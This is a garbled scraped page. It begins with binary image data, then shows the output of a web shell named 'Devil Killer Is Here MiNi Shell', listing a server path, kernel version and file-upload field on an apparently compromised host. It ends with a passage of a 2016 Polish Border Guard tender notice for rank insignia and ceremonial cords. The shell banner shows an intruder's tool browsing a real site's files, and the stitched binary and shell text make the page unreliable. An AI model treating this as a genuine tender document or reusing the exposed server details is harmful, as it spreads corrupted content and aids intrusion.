JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160705/119381-N-2016.html

<p class="kh_header"><b>Warszawa: Dostawa oznak stopni do umundurowania wyjściowego - oznak stopnia do kurtki wyjściowej, oznak stopni do umundurowania wyjściowego - pochewki do munduru, oznak stopnia do czapki polowej, oznak stopni do umundurowania polowego - pochewki, oznak stopnia do czapki służbowej letniej (w kolorze oliwkowym), oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze czarnym) oraz oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze złotym), oznak stopni do umundurowania wyjściowego - taśm otokowych, sznurów galowych podoficer</b><br>
<b>Numer ogłoszenia: 119381 - 2016; data zamieszczenia: 05.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Finansów Komendy Głównej Straży Granicznej , ul.  Podchorążych 38, 00-463 Warszawa, woj. mazowieckie, tel. 22 500 43 72, faks 22 500 47 82, 22 500 47 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oznak stopni do umundurowania wyjściowego - oznak stopnia do kurtki wyjściowej, oznak stopni do umundurowania wyjściowego - pochewki do munduru, oznak stopnia do czapki polowej, oznak stopni do umundurowania polowego - pochewki, oznak stopnia do czapki służbowej letniej (w kolorze oliwkowym), oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze czarnym) oraz oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze złotym), oznak stopni do umundurowania wyjściowego - taśm otokowych, sznurów galowych podoficer.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji: 
a) oznak stopni do umundurowania wyjściowego - oznak stopnia do kurtki wyjściowej w ilości 1 000 sztuk - część 1 zamówienia;
b) oznak stopni do umundurowania wyjściowego - pochewki do munduru w ilości 1 000 par - część 2 zamówienia;
c) oznak stopnia do czapki polowej w ilości 4 000 sztuk - część 3 zamówienia;
d) oznak stopni do umundurowania polowego - pochewki w ilości 11 065 par - część 4 zamówienia;
e) oznak stopnia do czapki służbowej letniej (w kolorze oliwkowym) w ilości 6 222 sztuk - część 5 zamówienia;
f) oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze czarnym) w ilości 6 200 par oraz oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze złotym) w ilości 600 par - część 6 zamówienia;
g) oznak stopni do umundurowania wyjściowego - taśm otokowych w ilości 1 000 sztuk - część 7 zamówienia;
h) sznurów galowych podoficera w ilości 700 sztuk - część 8 zamówienia.
Wymagany okres gwarancji na przedmiot zamówienia wynosi minimum 12 miesięcy od daty wydania przedmiotu z magazynu do użytkowania. Okres przechowywania przedmiotu zamówienia w magazynie wynosi maksymalnie 5 lat.
Ilekroć przedmiot zamówienia opisano przez wskazanie:
1) znaków towarowych (nazwy handlowej),
2) norm, 
Zamawiający dopuszcza zastosowanie rozwiązań równoważnych, przez które należy rozumieć, w odniesieniu do:
pkt. 1) - produkty spełniające wymagania Zamawiającego, co najmniej w tym samym zakresie, co opisane w OPZ,
pkt. 2) - rozwiązania związane z metodyką badawczą materiałów i wyrobu gotowego, w których badania wykonane będą według znowelizowanych norm lub innych procedur badawczych, o ile zastosowana metodologia będzie tożsama z metodologią normy wskazanej przez Zamawiającego w OPZ.
Wykonawca powołujący się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać w ofercie, że oferowany przez niego przedmiot zamówienia spełnia wymagania Zamawiającego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie, w przypadku złożenia na:
część 1 zamówienia - przynajmniej 1 dostawę oznak stopni do kurtki wyjściowej, wykonanych metodą haftu komputerowego w ilości nie mniejszej niż 500 sztuk;
część 2 zamówienia - przynajmniej 1 dostawę pochewek z oznakami  stopni, wykonanych metodą haftu komputerowego w ilości nie mniejszej niż 500 par;
część 3 zamówienia - przynajmniej 1 dostawę oznak stopni do czapki, wykonanych metodą haftu komputerowego w ilości nie mniejszej niż 2 000 sztuk;
część 4 zamówienia - przynajmniej 1 dostawę pochewek z oznakami  stopni, wykonanych metodą haftu komputerowego w ilości nie mniejszej niż 3 000 par;
część 5 zamówienia - przynajmniej 1 dostawę oznak stopni do czapki, wykonanych metodą haftu komputerowego w ilości nie mniejszej niż 2 000 sztuk;
część 6 zamówienia - przynajmniej 1 dostawę pochewek z oznakami  stopni, wykonanych metodą haftu komputerowego w ilości nie mniejszej niż 3 000 par;
część 7 zamówienia - przynajmniej 1 dostawę oznak stopni na taśmie otokowej, wykonanych metodą haftu komputerowego w ilości nie mniejszej niż 500 sztuk;
część 8 zamówienia - przynajmniej 1 dostawę sznurów galowych w ilości nie mniejszej niż 100 sztuk.
W przypadku składania oferty na więcej niż jedną część zamówienia, Wykonawca nie może posługiwać się tym samym dokumentem dowodowym, chyba że wielkość 
i zakres dostaw(y) w nim wyszczególnionych(ej) spełnia wszystkie wymagania określone dla tych części zamówienia, których wykonanie ma potwierdzić ten dokument dowodowy.
W przypadku Wykonawcy składającego ofertę na części 3 i 5 zamówienia - przynajmniej 1 dostawę oznak stopni do czapki wykonanych metodą haftu komputerowego w ilości stanowiącej nie mniej niż sumę minimalnych ilości przedmiotu zamówienia odpowiednio dla tych części.
W przypadku Wykonawcy składającego ofertę na części 2, 4 i 6 zamówienia - przynajmniej 1 dostawę pochewek z oznakami  stopni, wykonanych metodą haftu komputerowego w ilości stanowiącej nie mniej niż sumę minimalnych ilości przedmiotu zamówienia odpowiednio dla tych części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca jest zobowiązany do dostarczenia wraz z ofertą ostatecznego wzoru oferowanego przedmiotu zamówienia, w pierwszym stopniu jakości. 
W przypadku złożenia oferty:
na część 1 - oznak stopnia do umundurowania wyjściowego - oznak stopnia do kurtki wyjściowej, wg stopnia: plutonowy - 1 szt., sierżant sztabowy - 1 szt., młodszy chorąży - 1 szt., porucznik - 1 szt., pułkownik - 1 szt., 
na część 2 - oznak stopnia do umundurowania wyjściowego - pochewki do munduru, wg stopnia: plutonowy - 1 para, sierżant sztabowy - 1 para, młodszy chorąży - 1 para, porucznik - 1 para, pułkownik - 1 para, 
na część 3 - oznak stopnia do czapki polowej, wg stopnia: plutonowy - 1 szt., sierżant sztabowy - 1 szt., młodszy chorąży - 1 szt., porucznik - 1 szt., pułkownik - 1 szt., 
na część 4 - oznaki stopnia do umundurowania polowego - pochewki, wg stopnia: plutonowy - 1 para, sierżant sztabowy - 1 para, młodszy chorąży - 1 para, porucznik - 1 para, pułkownik - 1 para, 
na część 5 - oznak stopnia do czapki służbowej letniej w kolorze oliwkowym, wg stopnia: plutonowy - 1 szt., sierżant sztabowy - 1 szt., młodszy chorąży - 1 szt., porucznik - 1 szt., pułkownik - 1 szt.
na część 6 - oznaki stopnia:
haftowane czarną nitką do umundurowania służbowego, wg stopnia: plutonowy - 1 para, sierżant sztabowy - 1 para, młodszy chorąży - 1 para, porucznik - 1 para, pułkownik - 1 para, 
haftowane złotą nitką do umundurowania służbowego, wg stopnia: plutonowy - 1 para, sierżant sztabowy - 1 para, młodszy chorąży - 1 para, porucznik - 1 para, pułkownik - 1 para,
na część 7 - oznak stopnia do umundurowania wyjściowego - taśmę otokową, wg nw. stopnia: plutonowy - 1 szt., sierżant sztabowy - 1 szt., młodszy chorąży - 1 szt., porucznik - 1 szt., pułkownik - 1 szt., 
na część 8 - sznur galowy podoficera - 1 sztuka.
Niedostarczenie wzoru przedmiotu zamówienia lub dostarczenie wzoru niekompletnego lub niezgodnego z wymaganiami określonymi w SIWZ spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp. Przedstawiony wzór w trakcie dokonywania oceny przez komisję przetargową może ulec zniszczeniu (np. rozcięciu, rozerwaniu), za co Zamawiający nie ponosi żadnych kosztów.

W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w SIWZ, Zamawiający żąda złożenia wraz z ofertą następujących dokumentów: 
- w przypadku złożenia oferty na część 1, 2, 3, 4, 5, 6, 7 zamówienia:
a) analizy, atesty, raporty z badań lub inne dokumenty, zawierające wskaźniki techniczno-użytkowe tkaniny zasadniczej użytej do wykonania wzoru (-ów) przedmiotu zamówienia, potwierdzające spełnienie wymagań zawartych w opisie przedmiotu zamówienia.
Dokumenty te muszą być wystawione przez akredytowane laboratorium badawcze lub producenta tkaniny;
b) po jednym egzemplarzu dokumentacji techniczno-technologicznej, dotyczącej wytwarzania oferowanego przedmiotu zamówienia w polskiej wersji językowej, zawierającego co najmniej następujące informacje: opis przedmiotu zamówienia, rysunek (rysunki), wymagania techniczne (zawierające między innymi wykaz materiałów i dodatków niezbędnych do wykonania przedmiotu zamówienia), opis sposobu wykonania przedmiotu zamówienia oraz jego oznaczenia, opis sposobu pakowania i znakowania.
- w przypadku złożenia oferty na część 8 zamówienia:
a) jeden egzemplarz dokumentacji techniczno-technologicznej, dotyczącej wytwarzania oferowanego przedmiotu zamówienia w polskiej wersji językowej, zawierającego co najmniej następujące informacje: opis przedmiotu zamówienia, rysunek (rysunki), wymagania techniczne (zawierające między innymi wykaz materiałów i dodatków niezbędnych do wykonania przedmiotu zamówienia), opis sposobu wykonania przedmiotu zamówienia oraz jego oznaczenia, opis sposobu pakowania i znakowania.

Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu(ów), o którym(ych) mowa w pkt III.4.3.1) niniejszego ogłoszenia zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, przy czym dokument ten musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówienia Publiczne Biura Finansów Komendy Głównej Straży Granicznej, 00-463 Warszawa, ul. Podchorążych 38.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2016 godzina 11:00, miejsce: Kancelaria Biura Finansów Komendy Głównej Straży Granicznej, 00-463 Warszawa, ul. Podchorążych 38, budynek nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa oznak stopni do umundurowania wyjściowego - oznak stopnia do kurtki wyjściowej w ilości 1 000 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji oznak stopni do umundurowania wyjściowego - oznak stopnia do kurtki wyjściowej w ilości 1 000 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa oznak stopni do umundurowania wyjściowego - pochewki do munduru w ilości 1 000 par.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji oznak stopni do umundurowania wyjściowego - pochewki do munduru w ilości 1 000 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa oznak stopnia do czapki polowej w ilości 4 000 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji	oznak stopnia do czapki polowej w ilości 4 000 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa oznak stopni do umundurowania polowego - pochewki w ilości 11 065 par.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji	oznak stopni do umundurowania polowego - pochewki w ilości 11 065 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa oznak stopnia do czapki służbowej letniej (w kolorze oliwkowym) w ilości 6 222 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji	oznak stopnia do czapki służbowej letniej (w kolorze oliwkowym) w ilości 6 222 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakośc - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze czarnym) w ilości 6 200 par oraz oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze złotym) w ilości 600 par.</p>
